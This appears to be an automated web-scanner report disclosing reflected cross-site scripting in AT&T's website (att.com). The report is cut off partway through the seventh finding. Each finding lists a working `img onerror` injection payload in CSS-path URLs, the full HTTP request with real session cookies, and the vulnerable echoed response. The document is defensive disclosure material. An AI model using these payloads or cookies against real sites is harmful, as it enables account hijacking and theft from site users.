XSS in https://www.att.com | CWE-79 | CAPEC-86

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. https://www.att.com/olam/css/accordion.css [REST URL parameter 2] next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/css/accordion.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf956"><img%20src%3da%20onerror%3dalert(1)>dd6622d16b5 was submitted in the REST URL parameter 2. This input was echoed as cf956"><img src=a onerror=alert(1)>dd6622d16b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/csscf956"><img%20src%3da%20onerror%3dalert(1)>dd6622d16b5/accordion.css HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9088
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:23:38 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/csscf956"><img src=a onerror=alert(1)>dd6622d16b5/accordion.css">
...[SNIP]...

1.2. https://www.att.com/olam/css/accordion.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/css/accordion.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecdd2"><img%20src%3da%20onerror%3dalert(1)>eb6d59d2868 was submitted in the REST URL parameter 3. This input was echoed as ecdd2"><img src=a onerror=alert(1)>eb6d59d2868 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/css/accordion.cssecdd2"><img%20src%3da%20onerror%3dalert(1)>eb6d59d2868 HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9088
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:23:46 GMT
Connection: keep-alive
Set-Cookie: TLTHID=5A6FBA700B8C100B72D3DD9866917896; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/css/accordion.cssecdd2"><img src=a onerror=alert(1)>eb6d59d2868">
...[SNIP]...

1.3. https://www.att.com/olam/css/base.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/css/base.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd098"><img%20src%3da%20onerror%3dalert(1)>a27b0defcbc was submitted in the REST URL parameter 2. This input was echoed as cd098"><img src=a onerror=alert(1)>a27b0defcbc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/csscd098"><img%20src%3da%20onerror%3dalert(1)>a27b0defcbc/base.css HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9083
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:23:40 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/csscd098"><img src=a onerror=alert(1)>a27b0defcbc/base.css">
...[SNIP]...

1.4. https://www.att.com/olam/css/base.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/css/base.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d0b7"><img%20src%3da%20onerror%3dalert(1)>1c5bd0e2d4e was submitted in the REST URL parameter 3. This input was echoed as 9d0b7"><img src=a onerror=alert(1)>1c5bd0e2d4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/css/base.css9d0b7"><img%20src%3da%20onerror%3dalert(1)>1c5bd0e2d4e HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9083
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:23:48 GMT
Connection: keep-alive
Set-Cookie: TLTHID=5B8627C80B8C100B72EEDD9866917896; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/css/base.css9d0b7"><img src=a onerror=alert(1)>1c5bd0e2d4e">
...[SNIP]...

1.5. https://www.att.com/olam/css/bubbleTooltip.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/css/bubbleTooltip.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19f91"><img%20src%3da%20onerror%3dalert(1)>e78faed8f19 was submitted in the REST URL parameter 2. This input was echoed as 19f91"><img src=a onerror=alert(1)>e78faed8f19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/css19f91"><img%20src%3da%20onerror%3dalert(1)>e78faed8f19/bubbleTooltip.css HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9092
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:23:38 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/css19f91"><img src=a onerror=alert(1)>e78faed8f19/bubbleTooltip.css">
...[SNIP]...

1.6. https://www.att.com/olam/css/bubbleTooltip.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/css/bubbleTooltip.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1285"><img%20src%3da%20onerror%3dalert(1)>9324632880b was submitted in the REST URL parameter 3. This input was echoed as a1285"><img src=a onerror=alert(1)>9324632880b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/css/bubbleTooltip.cssa1285"><img%20src%3da%20onerror%3dalert(1)>9324632880b HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; DL3K=0; bn_u=6923325585437982304; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; __unam=7ba7478-12cdd7989ef-2fbe64b2-1; subDTAB=BUSINESS; entBusHomeBox1=0; entBusHomeBox2=2; DTAB=Tab=Res; op450wirelesssearchlandingpagegum=a02404n08u26cdl02f10cca75; op450phonedetailpagegum=a01703f07r26cfl05d1647fc3; op450phonedetailpageliid=a01703f07r26cfl05d1647fc3; __utmz=52846072.1292426425.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=52846072.14533459.1292205918.1292205918.1292426425.2; attPersistantLocalization=ltype=res|segment=res|company=bellsouth|state=Alabama|city=|dma=698|npanxx=334358; JSID_coredisp=0000faqis5o5G-K35ccnRPIv6SQ:14cs3p416; custClass=3; local_state=Alabama; ESUPPORTSESSIONID=JpRGNTvZrhRZgTp4hrGQBZYh!2105651400; ECOM_GTM=owbth_osaln_oesaln; ucvCookie=; BIGipServerpESUP_APP_7010=1021432199.25115.0000; TLTSID=54DA31220B8B100B6ECEAC6AA25AEBC1; TLTUID=54DA31220B8B100B6ECEAC6AA25AEBC1; svariants=CAL_PHD_2~B; fsr.s={"v":1,"rid":"1292775342411_742977","pv":1,"to":3,"c":"http://www.att.com/gen/general","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1292775384221}; BCNSESS=run=false; foresee.session=%7B%22alive%22%3A0%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A8%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A3%2C%22start%22%3A1292775384447%2C%22fsrid%22%3A%22%22%2C%22pv%22%3A1%2C%22current%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22cdi%22%3A0%2C%22lc%22%3A%7B%22att-support-econtactus%22%3A1%7D%2C%22ls%22%3A%7B%22att-support-econtactus%22%3Atrue%7D%2C%22ec%22%3A%7B%22att-support-econtactus%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22att-support-econtactus%22%2C%22idx%22%3A0%7D%2C%22previous%22%3A%22http%3A%2F%2Fwww.att.com%2Fesupport%2F%22%2C%22finish%22%3A1292775453764%7D; bn_search=true; TLTHID=85BE45760B8B100B694DDD9866917896; EDOCSSESSIONID=zcwlNTwNdsxkBcNl1ynC1WJ2wQF6QJBLvQ5yQ0hLh8Z4NNfX1s0J!-1335515953; stack=p2eam1m9; colam_ctn=l%3Den_US; browserid=A001265662746

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9092
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 16:23:45 GMT
Connection: keep-alive
Set-Cookie: TLTHID=59EFC6080B8C100B72C8DD9866917896; path=/; domain=.att.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title
...[SNIP]...
<meta name="DCSext.failedurl" content="https://www.att.com:443/olam/css/bubbleTooltip.cssa1285"><img src=a onerror=alert(1)>9324632880b">
...[SNIP]...

1.7. https://www.att.com/olam/css/css-includes.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.att.com
Path:	/olam/css/css-includes.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60a08"><img%20src%3da%20onerror%3dalert(1)>acc7ba1b7c1 was submitted in the REST URL parameter 2. This input was echoed as 60a08"><img src=a onerror=alert(1)>acc7ba1b7c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /olam/css60a08"><img%20src%3da%20onerror%3dalert(1)>acc7ba1b7c1/css-includes.css HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=U
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
